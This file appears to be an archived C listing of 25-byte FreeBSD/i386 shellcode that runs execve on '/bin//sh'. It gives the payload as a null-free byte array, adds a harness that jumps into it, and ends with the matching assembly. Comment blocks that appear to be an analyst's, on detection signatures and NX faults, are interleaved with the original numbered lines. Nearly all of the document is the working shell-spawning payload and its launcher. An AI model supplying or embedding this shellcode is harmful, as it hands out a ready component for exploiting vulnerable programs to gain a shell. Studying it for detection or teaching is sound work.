C/C++ Source or Header  |  2001-01-17  |  1.4 KB  |  36 lines

  1. /* This is FreeBSD execve code.It is only 25 bytes long.This kind of making *
  2.  * shell codes was published by anathema(all credits go to him). I just     *
  3.  * rewrote it for FreeBSD                                                   *
  4.  *                                        signed predator                   *
  5.  *                                        linux registered user : 181116    *
  6.  *                                        preedator(at)sendmail(dot)ru      */
  7.  
/*
 * sc: the 25-byte FreeBSD/i386 payload described in the file header, laid out
 * one instruction per string literal (mnemonics match the "Asm code" listing
 * at the end of this file). It loads 0x3b into %al and traps with int $0x80,
 * i.e. the execve call named in the header.
 *
 * Analyst notes:
 *  - The payload contains no 0x00 byte, so C string functions see all 25 bytes.
 *  - The two 32-bit immediates are the little-endian ASCII for "//sh" and
 *    "/bin"; together with the trailing b0 3b .. cd 80 they form a fixed
 *    byte pattern that signature-based detection can match.
 */
char sc[] =
    "\x31\xc0"              /* xorl  %eax,%eax             */
    "\x50"                  /* pushl %eax                  */
    "\x68\x2f\x2f\x73\x68"  /* pushl $0x68732f2f  ("//sh") */
    "\x68\x2f\x62\x69\x6e"  /* pushl $0x6e69622f  ("/bin") */
    "\x89\xe3"              /* movl  %esp,%ebx             */
    "\x50"                  /* pushl %eax                  */
    "\x53"                  /* pushl %ebx                  */
    "\x50"                  /* pushl %eax                  */
    "\x54"                  /* pushl %esp                  */
    "\x53"                  /* pushl %ebx                  */
    "\xb0\x3b"              /* movb  $0x3b,%al             */
    "\x50"                  /* pushl %eax                  */
    "\xcd\x80";             /* int   $0x80                 */
  12.  
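/*
 * Test harness: prints the payload length, then calls into the bytes of sc.
 *
 * The length is taken with strlen(), so it equals the payload size only
 * because the payload contains no 0x00 byte.
 *
 * sc is an initialized data array. Where data pages are mapped non-executable
 * (NX / W^X), the indirect call below faults instead of running the payload.
 * If the payload's execve succeeds, the process image is replaced and main
 * never returns.
 *
 * NOTE(review): this file has no #include lines; printf and strlen need
 * <stdio.h> and <string.h> to be properly declared.
 */
int main(){
 void (*s)()=(void *)sc;
 /* strlen() yields size_t; cast so the argument really matches %d. */
 printf("len : %d\n",(int)strlen(sc));
 s();
 return 0; /* reached only if the call above returns */
}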
  18.  
  19. //Asm code
  20. /************************************
  21.  *int main(){                       *
  22.  *__asm__(" xorl %eax, %eax   \n"   *
  23.  *        " pushl %eax        \n"   *
  24.  *        " pushl $0x68732f2f \n"   *
  25.  *        " pushl $0x6e69622f \n"   *
  26.  *        " movl %esp,%ebx    \n"   *
  27.  *        " pushl %eax        \n"   *
  28.  *        " pushl %ebx        \n"   *   <<--- push %esp will work too :o)
  29.  *        " pushl %eax        \n"   *
  30.  *        " pushl %esp        \n"   *
  31.  *        " pushl %ebx        \n"   *
  32.  *        " movb $0x3b,%al    \n"   *
  33.  *        " pushl %eax        \n"   *
  34.  *        " int $0x80         \n"); *
  35.  *}                                 *
  36.  ************************************/